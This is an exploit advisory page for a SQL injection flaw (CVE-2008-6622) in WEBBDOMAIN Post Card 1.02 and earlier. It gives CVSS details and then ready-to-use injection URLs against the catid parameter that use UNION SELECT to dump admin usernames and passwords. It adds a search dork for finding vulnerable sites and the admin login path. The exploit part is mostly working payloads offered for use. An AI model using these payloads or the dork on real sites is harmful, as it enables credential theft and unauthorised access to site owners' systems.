WEBBDOMAIN Post Card <= 1.02 (catid) SQL Injection Vulnerability

2009.04.09

Credit: Hussin X

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-6622

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

post Card ( catid )  Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

MaiL : darkangeL_G85@Yahoo.CoM
___________________________________

script    : http://webbdomain.com/php/postcarden/index2.php
script    : http://webbdomain.com/php/postcardir/index2.php

DorK   : inurl:choosecard.php?catid=
_____

ExploiT & Demo
_______

post Card  v 1.01

http://webbdomain.com/php/postcarden/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin--

post Card  v 1.02
http://webbdomain.com/php/postcardir/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin--

Note : Exploit in Properties  Picture

Login :
______
/admin

Greetz : All my freind

  Im IraQi        |         Im TrYaGi

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

WEBBDOMAIN Post Card <= 1.02 (catid) SQL Injection Vulnerability

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

WEBBDOMAIN Post Card <= 1.02 (catid) SQL Injection Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.